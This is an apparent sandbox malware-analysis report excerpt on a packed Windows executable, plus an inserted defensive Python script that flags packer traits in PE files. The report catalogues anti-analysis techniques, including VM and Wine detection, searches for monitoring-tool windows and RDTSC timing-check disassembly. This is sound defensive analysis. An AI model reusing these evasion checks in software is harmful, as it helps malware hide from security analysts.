              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: ondemandconnroutehelper.dll
              Source: k7T6akLcAr.exe | Static file information: File size 2951680 > 1048576
              Source: k7T6akLcAr.exe | Static PE information: Raw size of wxmqvxzx is bigger than: 0x100000 < 0x2a6e00

              Data Obfuscation

              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Unpacked PE file: 0.2.k7T6akLcAr.exe.da0000.0.unpack :EW;.rsrc :W;.idata :W;wxmqvxzx:EW;igxirnni:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wxmqvxzx:EW;igxirnni:EW;.taggant:EW;
              Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
              Source: k7T6akLcAr.exe | Static PE information: real checksum: 0x2d7664 should be: 0x2e01db
              Source: k7T6akLcAr.exe | Static PE information: section name: (empty)
              Source: k7T6akLcAr.exe | Static PE information: section name: .rsrc
              Source: k7T6akLcAr.exe | Static PE information: section name: .idata
              Source: k7T6akLcAr.exe | Static PE information: section name: wxmqvxzx
              Source: k7T6akLcAr.exe | Static PE information: section name: igxirnni
              Source: k7T6akLcAr.exe | Static PE information: section name: .taggant
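The static PE lines above, together with the "ZLIB complexity 0.9995" and "EXECUTABLE_IMAGE, 32BIT_MACHINE" lines under System Summary, are the packer indicators a triage script can reproduce before any sandbox run: random section names (wxmqvxzx, igxirnni) beside an empty one, the entry point sitting in .taggant rather than a code section, a section that is essentially incompressible, and a header checksum (0x2d7664) that no longer matches the file (0x2e01db). The script below is an added example, not part of the Joe Sandbox report or of Joe Sandbox; it uses only the standard library and implements the optional-header CheckSum algorithm, Shannon entropy per section (a stand-in for the zlib compressibility the report measures), and the section-name and entry-point checks. build_sample_pe() constructs a small demo file with the same traits; it is not the analysed sample, and the threshold, the section-name list and all function names are assumptions.

```python
"""Static packer-indicator triage for a PE file, standard library only.

Added example; not part of the Joe Sandbox report.  Checks: section names that
are not compiler defaults with the entry point outside a code section, a section
at near-maximum entropy, and a CheckSum that does not match the recomputed value.
build_sample_pe() is a constructed demo file, not the analysed sample.
"""
import math
import random
import struct

COMPILER_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".tls", ".bss", ".CRT", "CODE", "DATA"}
ENTROPY_THRESHOLD = 7.9   # bits/byte; assumption, typical of compressed or encrypted data
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not buf:
        return 0.0
    counts, n = [0] * 256, len(buf)
    for b in buf:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """CheckSumMappedFile algorithm: fold every dword except the CheckSum field
    itself into 16 bits with end-around carry, then add the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data: bytes):
    """Return (entry_rva, checksum_field_offset, stored_checksum, sections)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24                                   # optional header
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    cs_off = opt + 64                               # CheckSum: same offset in PE32 and PE32+
    stored = struct.unpack_from("<I", data, cs_off)[0]
    sections = []
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + i * 40)
        sections.append({"name": f[0].rstrip(b"\0").decode("latin-1"), "vsize": f[1],
                         "va": f[2], "raw": data[f[4]:f[4] + f[3]], "chars": f[9]})
    return entry_rva, cs_off, stored, sections


def triage(data: bytes) -> dict:
    """Run the checks; returns the entry-point section name and a list of findings."""
    entry_rva, cs_off, stored, sections = parse_pe(data)
    findings, entry_section = [], None
    for s in sections:
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], len(s["raw"])):
            entry_section = s["name"]
        if s["name"] not in COMPILER_SECTIONS:
            findings.append(f"non-standard section name {s['name']!r}")
        ent = shannon_entropy(s["raw"])
        if ent > ENTROPY_THRESHOLD:
            findings.append(f"high-entropy section {s['name']!r}: {ent:.3f} bits/byte")
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"writable and executable section {s['name']!r}")
    if entry_section is None:
        findings.append("entry point outside every section")
    elif entry_section not in (".text", "CODE"):
        findings.append(f"entry point in section {entry_section!r}")
    computed = pe_checksum(data, cs_off)
    if stored and stored != computed:
        findings.append(f"checksum mismatch: header 0x{stored:x}, computed 0x{computed:x}")
    return {"entry_section": entry_section, "findings": findings}


def build_sample_pe() -> bytes:
    """Constructed demo PE32 (not the analysed sample): a constant-byte .text, then a
    writable+executable section named .taggant filled with pseudo-random bytes,
    the entry point inside .taggant, and a deliberately wrong CheckSum."""
    rnd = random.Random(1)
    payload = bytes(rnd.getrandbits(8) for _ in range(0x2000))
    secs = [(b".text", b"\xcc" * 0x200, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE),
            (b".taggant", payload, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE)]
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2010)                         # entry RVA, inside .taggant
    struct.pack_into("<I", opt, 64, 0xDEADBEEF)                     # wrong CheckSum
    table, body, va, rptr = b"", b"", 0x1000, 0x400
    for name, raw, chars in secs:
        table += struct.pack("<8sIIIIIIHHI", name, len(raw), va, len(raw), rptr, 0, 0, 0, 0, chars)
        body += raw
        va += -(-len(raw) // 0x1000) * 0x1000                       # next 4 KiB-aligned RVA
        rptr += len(raw)
    return (dos + coff + bytes(opt) + table).ljust(0x400, b"\0") + body
```

`triage(open(path, "rb").read())` runs the same checks on a real file; on the demo file it reports the .taggant name, its entropy, its W+X flags, the entry point inside it and the checksum mismatch, while .text passes. Two caveats: a mismatched or zero checksum is common in unsigned, unpacked software too, so it is corroboration rather than evidence on its own; and entropy per section misses packers that spread a payload over several low-entropy chunks, which is why the report also records the run-time "Unpacked PE file" comparison of section rights.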
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Code function: 0_3_00A9D954 push esi; retf 0_3_00A9D957
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Code function: 0_3_0559E27A push ecx; retf 0_3_0559E2A0
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Code function: 0_3_0559DA03 push ecx; retf 0_3_0559E2A0
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Code function: 0_3_055999BD push esi; retf 0_3_055999C0
              Source: k7T6akLcAr.exe | Static PE information: section name: entropy: 7.972809484614253

              Boot Survival

              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA62B8 second address: FA6333 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F156h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F335931F148h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov esi, dword ptr [ebp+122D2706h] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F335931F148h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c mov esi, dword ptr [ebp+12465100h] 0x00000052 push eax 0x00000053 jp 00007F335931F150h 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA6C6A second address: FA6C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA7492 second address: FA74AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F157h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA74AD second address: FA74B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA89B2 second address: FA8A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F335931F148h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jng 00007F335931F14Ch 0x0000002d mov dword ptr [ebp+1244D3FAh], esi 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+1245A948h], edx 0x0000003b or si, 4B38h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F335931F148h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c xchg eax, ebx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F335931F155h 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA74B2 second address: FA74C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F335854CBBCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA74C6 second address: FA74CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAB4AA second address: FAB4BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335854CBBEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAB4BC second address: FAB4D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F335931F14Ch 0x00000011 jne 00007F335931F146h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAF483 second address: FAF492 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAF492 second address: FAF496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAF496 second address: FAF49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAB237 second address: FAB241 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F335931F146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F6496E second address: F64974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: F64974 second address: F64981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F335931F146h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAB241 second address: FAB25A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335854CBC5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB3B40 second address: FB3B5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335931F156h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB4AFD second address: FB4B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FABCCC second address: FABCD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FABCD2 second address: FABCD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB5CB1 second address: FB5D4C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F335931F14Ch 0x00000008 jg 00007F335931F146h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F335931F148h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov dword ptr [ebp+1245A75Bh], eax 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F335931F148h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f push 00000000h 0x00000051 mov ebx, ecx 0x00000053 xchg eax, esi 0x00000054 je 00007F335931F15Ch 0x0000005a jmp 00007F335931F156h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 jnp 00007F335931F146h 0x00000069 jmp 00007F335931F154h 0x0000006e popad 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB7D44 second address: FB7D49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB7D49 second address: FB7DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335931F159h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f and ebx, dword ptr [ebp+122D3BC8h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F335931F148h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov ebx, dword ptr [ebp+122D3A50h] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007F335931F148h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 mov bh, 16h 0x00000055 sub ebx, 3627D297h 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jns 00007F335931F14Ch 0x00000064 jg 00007F335931F146h 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FAF687 second address: FAF729 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F335854CBC8h 0x0000000c jnp 00007F335854CBB6h 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp], eax 0x00000017 push edx 0x00000018 jmp 00007F335854CBBBh 0x0000001d pop edi 0x0000001e add dword ptr [ebp+122DB936h], ecx 0x00000024 push dword ptr fs:[00000000h] 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F335854CBB8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov ebx, dword ptr [ebp+122D2D0Bh] 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 mov bh, 50h 0x00000054 mov dword ptr [ebp+122DB996h], eax 0x0000005a mov eax, dword ptr [ebp+122D0BB5h] 0x00000060 add edi, 4E64AF66h 0x00000066 push FFFFFFFFh 0x00000068 sub dword ptr [ebp+1244DC41h], eax 0x0000006e nop 0x0000006f pushad 0x00000070 push ecx 0x00000071 jo 00007F335854CBB6h 0x00000077 pop ecx 0x00000078 push eax 0x00000079 push edx 0x0000007a js 00007F335854CBB6h 0x00000080 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB8E60 second address: FB8E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335931F153h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB8E77 second address: FB8ECC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a jnp 00007F335854CBB8h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ecx 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F335854CBB8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+12471909h], edi 0x00000036 push 00000000h 0x00000038 mov edi, eax 0x0000003a xchg eax, esi 0x0000003b jng 00007F335854CBC1h 0x00000041 jmp 00007F335854CBBBh 0x00000046 push eax 0x00000047 push edx 0x00000048 push edi 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB06D0 second address: FB06D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB2DC8 second address: FB2DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB2DCC second address: FB2DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F335931F157h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB7F17 second address: FB7F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBAFF9 second address: FBB00F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F335931F146h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jo 00007F335931F14Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBC015 second address: FBC01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBC01A second address: FBC090 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F335931F148h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F335931F148h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 cld 0x0000002a push 00000000h 0x0000002c call 00007F335931F155h 0x00000031 mov ebx, esi 0x00000033 pop edi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007F335931F148h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 push eax 0x00000051 pushad 0x00000052 push edi 0x00000053 pushad 0x00000054 popad 0x00000055 pop edi 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBC090 second address: FBC096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB904E second address: FB9058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB9058 second address: FB90BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d popad 0x0000000e nop 0x0000000f clc 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov edi, 5C53BB6Fh 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov ebx, 1845787Ah 0x00000028 mov eax, dword ptr [ebp+122D093Dh] 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F335854CBB8h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 sub dword ptr [ebp+1245A413h], ebx 0x0000004e mov edi, dword ptr [ebp+1246D8F8h] 0x00000054 push FFFFFFFFh 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jc 00007F335854CBBCh 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FB90BF second address: FB90C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FBB1B6 second address: FBB1C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335854CBBDh 0x00000009 rdtsc
